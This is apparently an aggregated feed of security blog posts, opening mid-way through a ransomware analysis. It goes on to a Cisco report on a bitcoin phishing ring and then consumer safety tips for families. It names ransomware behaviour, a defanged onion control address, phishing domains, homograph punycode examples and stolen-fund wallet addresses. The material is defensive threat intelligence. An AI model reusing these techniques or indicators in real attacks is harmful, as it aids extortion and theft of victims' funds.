Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architect—and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering in Golang is a bit different than other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying the letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps:// The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.


Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.


Indicators of Compromise


  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\< username >\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher



The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

COINHOARDER: Tracking a Ukrainian Bitcoin Phishing Ring DNS Style

This post is authored by Jeremiah O'Connor and Dave Maynor with contributions from Artsiom Holub and Austin McBride. 

Executive Summary

Cisco has been tracking a bitcoin theft campaign for over 6 months. The campaign was discovered internally and researched with the aid of an intelligence sharing partnership with Ukraine Cyberpolice. The campaign was very simple and after initial setup the attackers needed only to continue purchasing Google AdWords to ensure a steady stream of victims. This campaign targeted specific geographic regions and allowed the attackers to amass millions in revenue through the theft of cryptocurrency from victims. This campaign demonstrates just how lucrative these sorts of malicious attacks can be for cybercriminals. Additionally, the revenue generated by these sorts of attacks, can then be reinvested into other cybercriminal operations.


On February 24, 2017, Cisco observed a massive phishing campaign hosted in Ukraine targeting the popular Bitcoin wallet site with a client request magnitude of over 200,000 client queries. This campaign was unique in that adversaries leveraged Google Adwords to poison user search results in order to steal users' wallets. Since Cisco observed this technique, it has become increasingly common in the wild with attackers targeting many different crypto wallets and exchanges via malicious ads.

Cisco identified an attack pattern in which the threat actors behind the operation would establish a "gateway" phishing link that would appear in search results among Google Ads. When searching for crypto-related keywords such as "blockchain" or "bitcoin wallet," the spoofed links would appear at the top of search results. When clicked, the link would redirect to a "lander" page and serve phishing content in the native language of the geographic region of the victim's IP address.

The reach of these poisoned ads can be seen when analyzing DNS query data. In February 2017, Cisco observed spikes in DNS queries for the fake cryptocurrency websites where upwards of 200,000 queries per hour can be seen during the time window the ad was displayed. Here are two examples.

DNS Statistics for block-clain[.]info
The domain block-clain[.]info was used as the initial "gateway" victims would first visit. Victims would immediately be redirected to blockchalna[.]info, the landing page where the actual phishing content was hosted. These fraudulent sites are mostly hosted on bulletproof hosting providers based in Europe.

Here is what the actual lander phishing site looked like. Note how similar and convincing it is compared to a real site, with the exception of the URL:

Finding Additional Pivots

After discovering these domains and the activity on Google Adwords, Cisco implemented a system to flag similar domains as malicious. This resulted in DNS requests being blocked to said domains. Additionally, Cisco researchers were able to track and monitor related networks and info, such as WHOIS registrant data.

This information allowed Cisco to use DNS graph traversal techniques to uncover other phishing domains associated with the initial site. In this example, we can see the registrant dsshvxcnbbu@yandex[.]ru, which is also associated with many other phishing sites:
Cisco also monitored the networks these domains are hosted on. Here is a snapshot of 2 of the recently active IP addresses for this campaign, and, and the ASN associated with these domains, Highload Systems, in Ukraine.
We can see the Second Level Domain (SLD) strings in these domains follow a similar pattern of targeting with many permutations of the string "blockchain", along with co-occurrences of "http", "https", "wallet" in the SLD string. Here is a graph visualization of the domains on these infrastructures:

Geographic Targeting

One of the most interesting facets to these attacks are the geographic regions of the victims. Using data from Umbrella Client Requester Distribution queries to these malicious domains, we can see a significant number of DNS resolution requests coming from countries such as Nigeria, Ghana, Estonia and many more.
This threat actors appears to be standing up phishing pages to target potential victims African countries and other developing nations where banking can be more difficult, and local currencies much more unstable compared to the digital asset. Additionally, attackers have taken notice that targeting users in countries whose first language is not English make for potentially easier targets. Based on the number of queries, this campaign is one of the biggest targeting to date. has been very proactive in supporting users. Kristov Atlas, a security and privacy engineer at, has even gone so far to say "phishing is one of our top areas of concern in protecting our users."

Quantifying Attacker's Revenue

Cisco has evidence the COINHOARDER group has been actively pilfering Bitcoin since at least 2015. Based on our findings, we estimate this group has stolen tens of millions of USD in cryptocurrency. While working with Ukraine law enforcement, we were able to identify the attackers' Bitcoin wallet addresses and thus, we could track their activity for the period of time between September 2017 to December 2017. In this period alone, we quantified around $10M was stolen.In one specific run, they made $2M within 3.5 week period. Here we have a screenshot of one of the wallets, 19yAR4yvGcKV3SXUQhKnhi43m4bCUhSPc, related to this actor group, which has received a total of $1,894,433.09.
While identifying the individual who owns a specific wallet is extremely difficult, we still can look for open source intelligence surrounding the wallet. In December 2017, Cisco found posts on Reddit and Stack Exchange with addresses associated with stolen funds from this campaign, 13wahvu3FP8LK8P51UmEkhBUhyC7mzkrn3.

The wallet address in the screenshot above was also mentioned in a Reddit post in October 2017.

Based on our findings associated with this syndicate, we estimate the COINHOARDER group to have netted over $50M dollars over the past three years. It is important to note that the price of Bitcoin has shot up drastically over 2017, starting around $1,000 in January and hitting a high point just under $20,000 in December. While criminals were able to profit from this, it also adds a new level of complexity for criminals to convert their cryptocurrency funds to a fiat currency like US dollars. The historic price of Bitcoin during the height of this campaign would have made it very difficult to move these ill-gotten finances easily.

Ukraine: A Hotbed For Crypto Theft

Ukraine is a hotbed for many types of attacks and a home for known bulletproof hosting providers. In the past year, Cisco has witnessed a substantial rise in financial motivated campaigns coming from and targeting this region. One of Cisco's goals is to collaborate with countries worldwide and use our global visibility on attacks to asses their security posture and help improve it.

Some other observed IPs are and, which host domains targeting many currencies using IDN and SSL certs and are hosted on VServer in Ukraine. We also observed AS 58271 hosting multiple search engine poisoning attacks on Google and Bing:

New Effective Attack Techniques

Cisco has observed this threat actor evolve over time. Not only have we seen the COINHOARDER group abuse Google Adwords to generate traffic to their phishing servers, but we have also observed this group evolve to make their sites appear more legitimate. A few months after we began tracking this particular group, we observed them starting to use SSL certs issued by Cloudflare and Let's Encrypt. SSL certificate abuse has been a rising trend among phishing campaigns in general. Below is an example of a wildcard SSL certificate issued by Cloudflare for the domain bockchain[.]info.
Here is an example of one of these SSL certificates issued by Let's Encrypt associated with this campaign and the site blockcharin[.]info.
The COINHOARDER group has made heavy use of typosquatting and brand spoofing in conjunction SSL signed phishing sites in order to appear convincing. We have also observed the threat actors using internationalized domain names. These domains are used in what are called homograph attacks, where an international letter or symbol looks very similar to one in English. Here are some examples from this campaign.

The Punycode (internationalized) version is on the left, the translated (homographic) version on the right:

xn--blockchan-d5a[.]com → blockchaìn[.]com

xn--blokchan-i2a[.]info → blokchaín[.]info

These attacks can be nearly impossible to spot with the human eye, especially when delivered on a mobile platform and using these techniques helps coax users into handing over their funds.


Crypto assets have proven to be a new, valuable financial commodity targeted by varying degrees of cyber criminals. In 2017, we observed phishers advance their tactics by utilizing new attack vectors such as Google Adwords combined with the use of IDNs and rogue SSL certificates to improve their probability of success, and generate millions in profit.

What is clear from the COINHOARDER campaign is that cryptocurrency phishing via Google Adwords is a lucrative attack on users worldwide. Phishers are significantly improving their attack techniques by moving to SSL and employing the use of IDNs to fool victims into handing over their credentials. We can expect to see more of these realistic looking phishes with Let's Encrypt releasing full wildcard certificate support at the end of this month. Cisco will continue to monitor the landscape and coordinate with international law enforcement teams in 2018 to help protect users and organizations.


The following IP address are known to have been used in these phishing attacks:


    Additional ways our customers can detect and block this threat are listed below.

    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on



    Here you can view more about how Cisco Security has worked hard on helping securing the cryptocurrency landscape:

    8 Easy Ways to Hack-Proof Your Family’s Smartphones

    Smartphones have changed the face of parenting in profound ways. But for all the efficiency they’ve introduced into family life, those same devices simultaneously bring risk.

    With smartphone and tablet use growing at ten times the rate of PCs, hackers know precisely where to shift their focus these days. Cyber thieves love smartphones because once inside, they can access private information, location, email, photos, social media, and bank accounts.

    If you’re a parent, a smartphone breach is an even bigger deal. Shoring up the security gaps in your phone isn’t a big deal but what about the other four or more smartphones under your roof? If you were to multiply the risk, you’d soon realize the potential havoc that’s looming.

    While you can’t shut out every digital risk, you can tackle the most prominent ones. Let’s get started!

    8 Ways to Hack-Proof Your Family’s Smartphones

    1. Think Like a Criminal. Work a potential hack backward. Look at every possible entryway into your phone and ask yourself, “How could I get into this phone if I were determined?” Then, methodically lock up each digital door. Challenge yourself to find every security gap. Examine your password strength, social profiles, web browsing security, general and app settings.
    2. Juice Up Your Password. How do you create a password that a criminal can’t hack? With great intention and a few extra layers. 1) Avoid the common error of using easy passwords such as “12345” or “password.” Get complex and create a combination that isn’t logical. 2) Use multi-factor authentication (MFA). Having multiple factors to authenticate your phone use such as your fingerprint, face, or a trusted device, increases security. Most smartphones offer MFA so, even if it seems tedious, use it. The more factors — or digital layers — you can combine, the more protected your smartphone will be. Too many passwords crowding your brain? Consider a password manager.
    3. Trust No App. Not all apps you download to your phone are created equal. Many third-party apps do not go through rigorous security vetting of Google or Apple. Hackers can infect apps with malware or viruses that demolish your phone’s security and allow hackers access to your data. Beware. Examine all apps, read reviews, and steer clear of apps that ask for too much access. Even legitimate apps can be used for malicious purposes such as listening in via a phone’s microphones and even spying using a phone’s camera. To pull back an app’s access, just go to your settings. On Android: Go to Apps and Notifications, choose App Permissions and make changes. On iOS: Go to your settings, select Privacy, and make changes to app permissions accordingly.
    4. Passcode, Track Your Phone. Be proactive in case your phone gets stolen or lost. Make sure your device is passcode and fingerprint protected. Take a few minutes to enable phone tracking. For Android, you’ll download the app Find My Device and for Apple use Find My iPhone. Make sure those apps are always enabled on your phone. If your phone is lost or stolen it can be tracked online.
    5. Log out, Lock Online Services. If you bank, shop, or access sensitive accounts via your smartphone do it with extreme care. This means logging out and locking those accounts when not in use and avoiding using auto-login features. Instead, use a password manager app the forces you to re-enter a master password each time you want to access an account. It’s worth the extra step. An essential part of this equation is disabling keychain and auto-fill in your browser. You can do this by finding your web browser in Settings and toggling each option to OFF. Also, avoid using public Wi-Fi for accessing sensitive accounts or conducting any transactions.
    6. Turn Off Bluetooth. Bluetooth carries inherent vulnerabilities and is another open door for hackers to enter. When Bluetooth is turned on it is constantly looking for other open connections. Hackers work quickly through open Bluetooth connections, and often victims don’t even know there’s been a breach (there’s no evidence a phone has connected with a criminal source). Make sure to switch Bluetooth off if you are not using it.
    7. Take Updates Seriously. Because people design phones, phones will be flawed. And, it’s just a matter of time before a hacker discovers and exploits those flaws. Developers use updates to combat all kinds of breaches, which make them critical to your phone’s security. Along with staying on top of updates, consider the added safeguard of antivirus, identity, and privacy protection that covers all family devices.
    8. Stop! Don’t Click that Link. Unless you are 100% sure of the legitimacy of a link sent to you through text, email, or direct message, do not click it. Random links sent by hackers to access your data are getting more and more sophisticated as well as destructive.


    toni page birdsong



    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

    The post 8 Easy Ways to Hack-Proof Your Family’s Smartphones appeared first on McAfee Blogs.

    Global cybercrime behemoth busted, 36 people indicted

    According to US authorities, the enterprise aimed at becoming the premier destination for the buying and selling of stolen payment card data and forged identification documents. It is believed that the losses that the Infraud Organization had intended to cause were north of $2.2 billion.

    The post Global cybercrime behemoth busted, 36 people indicted appeared first on WeLiveSecurity

    5 Digital Family Values to Embrace to Make the Internet a Better Place

    A better internet — one free of bullying, division, hate, and crime — isn’t just an aspiration, it’s truly possible. And, it starts with the individual digital user. It starts with you, with me, and the next generation of users we’re raising up. That’s the message of the annual worldwide Safer Internet Day, which is Tuesday, February 6.

    The global movement has a message this year to “create, connect and share respect” online and challenges everyone from parents, to youth, to educators, to businesses to focus on how to use the internet’s power to bring people together.

    We’ve put together a list of values to consider that might help your family respond to the challenge of Safer Internet Day. Can one family make the internet a safer, more positive place for us all? We think so. People affect change and influence millions of people every day online. Each one of us has the choice to lead or sit on the sidelines on this critical topic. Even the smallest act of kindness or respect online generates digital ripples. So, just begin. (You can also join in the worldwide social media push with a Thunderclap post supporting #SID2018 on the morning of Feb. 6 to kick start Safer Internet Day)!

    5 Digital Family Values to Upload Every Day

    1. The value of the pause.

      The online culture gives our discernment a workout every second, doesn’t it? Teaching kids to become critical thinkers who are responsible for their online choices is a value that is reinforced in big and small ways every day. A few questions to challenge kids to ask before posting might be:

    • Is this a value I share or am I just echoing my friends?
    • Am I too emotional to be online right now?
    • Do I have all the facts before I respond?
    • What’s the flip side of this issue, the other opinions?
    • Is what I want to say online necessary, helpful, or kind?
    1. The value of empathy.

      Empathy is making a genuine attempt to understand another person’s struggle and it’s a powerful way to combat bullying, hate, and prejudice online. Digital communication can make it harder to feel empathy for other people. Hearts get lost in the clicking, liking, and sterile acronyms. Looking for ways to teach empathy means highlighting real-life situations and asking your kids to think deeper, put themselves in another person’s shoes, and genuinely reflect on the emotional fallout.

    2. The value of responsibility.

      Making the internet a safer place for all, requires parents and kids to embrace, repeat, and consider the basic safety principals that create our digital footprint. One way is to help kids understand their digital footprint and the responsibility that comes with owning a digital device of any kind. Pose these questions to your child:

    • Is this something you really want everyone to know that about you?
    • What do you think this photo communicates about you (use adjectives)?
    • How do you think that person would feel if he or she saw your post about them a few years from now?

    One of the best ways to grow your child’s sense of digital responsibility is to role-play. Find teachable moments in which empathy or responsible online behavior has been ignored.

    Ask your child questions that will challenge him or her to verbalize what another person might be feeling or thinking. Putting words to a cruel or unfair situation brings it to life and is an effective way to dismantle stereotypes, prejudices, and digital inequities.

    4. The value of media literacy.

    Media literacy is a skill that allows digital users to become critical thinkers and creators, effective communicators, and active digital citizens. This means we all play a role in making the Internet a safe place to exchange ideas and appropriate content. is an excellent media literacy equipping hub for families and educators.

    5. The value of parental example.

    If you’re serious about influencing your child’s behavior online, the most powerful teacher is you. Take inventory. Be the example of a balanced, responsible, empathy-driven internet user. Model balance. Limit your time on social networks when at home, unplug consistently, don’t let technology come before people. Model responsibility. Post and comment wisely, and always keep your emotions in check online. Model humility. Part of being the example includes being able to admit your digital mistakes. Kids need to know you aren’t perfect and learn from how you handled a digital situation such as cyberbullying, a political argument, or even a closeted tech addiction. Be open, honest, and candid in leading your kids in social appropriateness. Model empathy. Be sensitive to others online. Use your wisdom to mend a broken situation and do the harder thing in an emotion-charged circumstance. Your kids are watching you.

    toni page birdsong



    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 


    The post 5 Digital Family Values to Embrace to Make the Internet a Better Place appeared first on McAfee Blogs.

    Follow the trail of evidence – 02.20.18

    So you’ve been breached. Gigabytes upon gigabytes of data are now in the hands of…well, someone. It could be the guy across the hall who just got fired; perhaps it was a competitor; or maybe it was just some hacker looking for a quick payday. In any case, trust in your organization is dwindling. Your bosses, the customers, and the media are all breathing down your team’s collective necks, demanding answers. What do you do next?

    That’s what we’ll be investigating this coming February 20th, during the launch of the new eLearnSecurity training course, Digital Forensics Professional (DFP).

    Letting the evidence speak

    For our first course of 2018, we look into the overlap between tech and criminal justice—the field of digital forensics.

    Much like traditional crime scene investigations, digital forensics involves the collection and analysis of information that could be used to reconstruct a certain incident, or as evidence in tracing a cyber attack back to its source—usually with the goals of asset recovery, attribution, or criminal/civil prosecution. Such incidents include cyber attacks, data theft, industrial espionage, and even non-criminal acts like internal investigations within organizations.

    Digital Forensics Professional introduces security professionals to the more inquisitive side of cybersecurity. The course enables students not only to investigate cyber crimes, but also to assist in cases of incident response or proactive threat hunting.

    Regardless of your role in your team, DFP ensures that you gain the skills to make you an all-around and valuable blue team member.

    The investigation begins…

    We open the DFP case files on February 20, 2018 at 1:00 PM ET. Join us in this live launch webinar by signing up here.

    As usual, two lucky attendees will get to begin their Digital Forensics Professional training for free, while everyone else will be first-on-scene for our #DigitalForensicsPro launch deals.

    The Reality of an Incoming C1 Cyberattack on the UK

    “When, not if.”

    Ciaran Martin, head of the U.K.’s National Cyber Security Centre (NCSC), used those words to say he is expecting a devastating cyberattack will hit the U.K. in the next two years. The attack, he believes, will bring disruption to British elections and critical infrastructure. These remarks were made in light of newly released figures detailing the number of cyberattacks on the U.K. in the last 15 months. Martin said the U.K. has been fortunate to avoid a so-called category one (C1) attack, broadly defined as an attack that might cripple infrastructure such as energy supplies and the financial services sector.

    His prediction initially brings one thing to mind – WannaCry. A strain of the ransomware impacted 50 countries and infected more than 250,000 machines in just one day. Its exploits included a massive takedown of 16 U.K. NHS medical centers. WannaCry was rated by the NCSC as a C2 level of attack, milder than the C1 Martin says is still to come.

    Organisations across the U.K. were unprepared when WannaCry hit last May, and there is no simple fix to protect everyone. Martin concedes total protection is impossible, stating “Some attacks will get through. What you need to do is cauterise the damage.” The NCSC has been gradually building defenses and is due to publish a 60-plus-page dossier outlining what has worked and what has not since it opened in October 2016. Defense is a responsibility that falls on all of our shoulders, and begins with a new mentality that attacks are inevitable, and preparedness vital for a “culture of security.”

    There is a misconception that cybersecurity is an IT issue that affects systems, not ordinary people. The reality is that cybercrime hurts us all. A massive cyberattack impacts economies, governments, innovation, growth, even global state of mind. If we all accept the reality of a potential C1 attack, we also accept the challenge to bond together in a new pact to protect the assets and values we hold dear. We must to do this. It’s a matter of when, not if.

    To learn more about modern day threat landscape, be sure to follow us at @McAfee and @McAfee_Labs.

    The post The Reality of an Incoming C1 Cyberattack on the UK appeared first on McAfee Blogs.

    How to Treat Your Family’s Personal Data Like Gold in a Hyper-Connected World

    Tomorrow, January 28, is National Data Privacy Day. While that may not mean a lot to you at first glance, the day shines a light on one of the most critical issues facing families today — protecting personal information in a hyper-connected world.

    The day gives us an opportunity to 1) honestly examine the many ways our lives are connected and, 2) to take responsibility (and steps) to safeguard each area of personal privacy we expose — or potentially misuse — every time we power up.

    Data Channels

    Every day we connect our lives to external sources that are useful, productive, and entertaining without even realizing the many ways others can exploit our digital connections. There are the obvious sources that present a risk to our data such as social networks, online shopping, web browsing, and apps. Then there are the not-so-obvious sources that gather our information such as medical offices, schools, financial institutions, retail businesses, household assistants, TVs, home security systems, appliances, toys, and wearables.

    Studies show that most of us certainly are not going to give up our connected lives to prevent a data breach. So, the next practical step is to get more intentional about our family’s privacy and take specific actions to minimize our risk.

    The Risks Are Real

    If you’ve never suffered the consequences of another person or organization exploiting your personal information, then you may not understand the seriousness of protecting it. However, as we all become more seamlessly connected in an Internet of Things (IoT) world, chances are you will experience some data misuse or abuse in the future. Those acts might be large-scale breaches such as the ones we’ve seen with Equifax, Uber, and Verizon or the breach may be on a smaller scale but just as financially and emotionally damaging.

    When personal data gets hacked, sold, or exploited several things can happen. Digital fallout includes identity theft, credit card fraud, medical fraud, home break-ins, data misuse by companies, reputation damage, location and purchasing tracking, ransomware, and much more.

    So the technology-driven future we’ve imagined is here — and it’s pretty awesome — but so too are the risks. And who among us could have guessed that parenting in the 21st century would include teaching kids about cybercriminals, data mining, and privacy breaches?

    Step-Up Family Privacy

    Treat privacy like gold. If more of us saw our personal information the way cybercriminals see it — like gold — then we may be more inclined to lock it up. Guiding your family in this mind-shift requires real effort. Teach your kids to view their personal information — address, habits, personal routine, school name, relationships, passwords, connected devices — as gold. Gold is to be treasured, locked up, and shared with great discernment. This attitude change may take time but, hopefully, the return on investment will mean your kids pause before handing over personal info to an app, a social network, a retail store, or even to friends.

    Stress responsibility and respect. Stopping to think before you share online or connect a digital device is a key to safeguarding digital privacy. By teaching your kids that living in a connected world comes with responsibility for one’s actions and respect for others, you a leap in securing our family’s online privacy.

    Routinely secure the basics. There are fundamental security measures under our roofs that cybercriminals are counting on all of us to neglect (and many of us do just that). Powerful security steps include: 1) Update all software (PC, phone, tablets, etc.) routinely 2) Establish and maintain strong passwords 3) Secure privacy settings on all social networks 4) Lock down your home network 5) Don’t overshare family details (names, travel, location, address, friends) online.

    Make privacy fun. Here’s something to ponder. Challenge your kids to keep a low profile online. Talk about the power of being discreet, private, and mysterious in their digital peer group. Encourage them to set themselves apart by being the one who isn’t so easily accessed. Ask: Is digital sharing an enjoyable thing or, in reality, has it become an exhausting habit? Challenge them to go undercover (dark) online for a week and journal the pros and cons of being hyper private online. Come up with an incentive that works for your family.

    Enjoy the Wows

    Overall, stop and consider what your digital devices, apps, games, and products are asking of you. Is that fitness tracker getting a little too personal? Does that new toy, home security system, or household assistant know more than your family than your own mother does?Then don’t fill in every blank box. Go into the privacy settings and shore up product access, freshen up your passwords, and make sure you stay on top of software updates. Stop giving retailers, government agencies, and online marketers your email address. In short — pay attention, protect, and cherish your personal data. You can enjoy the wows of your technology without opening up your family’s privacy.

    toni page birdsong



    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

    The post How to Treat Your Family’s Personal Data Like Gold in a Hyper-Connected World appeared first on McAfee Blogs.

    Your Back To School Tech Plan

    I am such a fan of school holidays! No music lessons, no sport, no commitments. Bliss!! The crazy school term routine is no more and people can just ‘be’. Marvellous!! But all good things must come to an end. So, unless you want the police knocking on your door, the kids must go back to school. Ughh! So much to do. Where to start?

    So, there’s shoes, uniforms, enrolments in music, drama and sport, haircuts, stationery and then of course, all things technology! Ah yes, the ‘t’ word. When you’re juggling work, running a house and a tribe of kids, managing your kids and their tech lives can be overwhelming. But as parents, it is essential that we take the time to make sure we have all things technology covered for our kids.

    What Are The Main Risks Kids Face Online?

    The internet, our connected devices and online activity are such a huge (and permanent) feature of our modern lives. As parents, we owe it to our kids to make sure we can prevent some of the dangers associated with a connected life. Whether it’s phishing scams, online predators, oversharing, downloading malware, falling for an online scam or worst case, becoming the victim of cyberbullying, teaching our kids how to navigate some of the perils of the online world is essential.

    How Can I Help My Kids Navigate Online Dangers?

    Without a doubt, the absolute best way of protecting our kids is taking the time to better understand how the online world really works. And I understand that means time – something many of just don’t have. But if you could scan the tech news of your favourite online news site every day and then allocate 20 minutes each week to research a new app or social media platform, you’d be surprised how quickly you could get yourself into good cyber parenting shape.

    The Back To School To-Do List

    But let’s keep it simple. It’s already January and there isn’t a lot of time left to get organised. So, here’s what I think you should focus on tech-wise to make sure you can cross technology off your ‘back to school’ to-do list.

    1. Install Security Software On ALL Devices.

    Many people invest in security software for their laptops, which is great. However, all devices need to be protected. Anything you can download on a laptop, you can download on a tablet or phone.

    Many security software packages will include coverage for a ‘fleet’ of devices. McAfee® Total Protection software provides premium antivirus, identity and privacy protection for all your PCs, Macs, smartphones and tablets – in one subscription. Easy!

    2. Know How To Connect Safely On Public Wi-Fi Networks.

    Wi-Fi can be an extraordinarily risky affair with hackers spending a lot of time developing ways to extract users’ personal information. If your kids absolutely must connect, ensure it is a secured Wi-Fi which means it requires a password. However, this is still not 100% safe so no banking, financial or shopping transaction should be conducted on Wi-Fi.

    Why not consider investing in a Virtual Private Network (VPN)? A VPN provides a secure encrypted connection which means that anything you send or receive is safe. Check out McAfee’s VPN, McAfee® Safe Connect – it provides bank-grade Wi-Fi encryption, which means you can relax!

    3. Schedule Regular Data Backups.

    ‘Losing’ a document is so frustrating! Avoid those late-night homework traumas and ensure your kids regularly scheduled data backups for their main devices. You could choose to back-up to a hard drive, but I think an online backup service is probably easier to use. Whether it’s Google Drive, Dropbox or OneDrive – find an online provider and set this up BEFORE school projects get underway!

    4. Ensure All Device Software Is Up-To-Date.

    Software updates (and reminders) can be super annoying and interrupt the flow of a busy day. But keeping your software up-to-date is actually one of the best ways of protecting yourself from the latest online threats.

    Why not select auto-updates for software on all your devices – including your smartphones? If your software doesn’t offer auto-updates, schedule a monthly reminder in your calendar to check for and install available updates.

    5. Understand Your Child’s School BYOD Policy.

    Make sure you understand the Bring Your Own Devices (BYOD) policy of your child’s school. Some schools require parents to be responsible (and pay) for repairs, insurance and online security associated with your child’s laptop or tablet; others will provide this for an annual fee. Please take the time to understand this before the school year starts and an issue occurs.

    I know it may seem like a bit of work but taking these precautionary steps now means your kids are as protected as can be when enjoying their online lives and of course doing their homework this year! And make sure you also take the same steps to protect the adults (and their devices) in your house as well! They are just as important.

    Here’s to a great school year!!

    Take care,

    Alex xx


    The post Your Back To School Tech Plan appeared first on McAfee Blogs.

    Determined to Find Love Online in 2018? Here are 5 Ways to Protect Your Privacy

    It turns out January is the busiest month for online dating since millions of singles have resolved to embark on new adventures — and even finding love — in 2018.

    And why not? According to the Pew Institute, over the last ten years, online dating has lost a lot of its stigma, and a majority of Americans now say online dating is a great way to meet people.

    But before you start answering personal questions, uploading photos, and chatting with strangers on dating apps like Match, Bumble, Plenty of Fish, eHarmony, Tinder, or OkCupid, it’s a good idea to add a measure of security to your strategy.

    We’ve all heard stories of online dates that end terribly or even tragically. However, what you may not be aware of is that with just a few small nods toward security, you can enjoy the fun of online dating minus the worry.

    5 ways to protect your privacy on dating apps

    1. Choose a reputable dating app. Check to see if the dating site takes your privacy seriously. Currently, there are hundreds of dating apps and most will ask you dozens, even hundreds, of personal questions to match you with another member. It’s important to understand what the company is planning to do with all of the information it gathers from you. This information should be under the service’s terms of service/use.Consider the following:
    • Does the dating app delete your data after you close your account?
    • Some dating sites make user profiles public by default, which means search engines can index them. You can change this immediately to your account’s privacy settings.
    • A site’s privacy policy should be clear about how it shares your personal information, other members. It should also be clear about any third-party access to your data.
    • Make sure you understand how your uploaded photos will be used and opt out of any advertorial applications.
    1. Keep personal info zipped. Everyone wants to make a great impression but create your profile with care. Go through your digital footprint (past online activity) and delete any information that gives away too much personal insight into where you live, your family, your favorite places, or your job. Delete details that could help someone track you outside of the dating app. Think carefully about what you write.
    2. Check your digital self. When dating online take a few extra steps to protect the privacy of your daily routine. 1) Stop using check-in apps 2) turn off the geo-location in your phone settings, which could allow a dating app to track you 3) When using apps like Facebook, Snapchat, and Instagram choose not to post your location. To take your privacy a step further, go back and delete the location on earlier photos. It’s easier than ever for someone to go into an app and see a mapped pattern of places you frequent. 4) Consider making your social media accounts private for the duration of your online dating.
    3. Beware of the catfish. Unfortunately, catfish — people posing as someone else online — have made their way into dating apps. Do your homework on the other person as much as possible. Check out social profiles. If something feels fishy, rethink meeting IRL (In Real Life). Use Reverse Image Search to make sure a person’s profile picture is legitimate. When messaging within a dating app, never share your location, phone number, banking information (obvious but not for everyone), or workplace. Catfish have become incredibly sophisticated and should not be underestimated.
    4. Inform a friend. This one is more about physical safety but can’t be stated enough. If you arrange to meet with a person outside of the dating app, be sure to let a friend know all the details of the meeting including the name of the person you are meeting. Agree on a location where your friend can pick you up if there’s a problem. Always meet a “date” in a public place and never allow a date to pick you up or drop you off at your home.

    Thanks to technology, the world is now your digital oyster when it comes to finding love. So, after you’ve locked down a few critical pieces of your online life, don’t forget to have fun . . . and swipe right.

    toni page birdsong



    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

    The post Determined to Find Love Online in 2018? Here are 5 Ways to Protect Your Privacy appeared first on McAfee Blogs.

    How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals

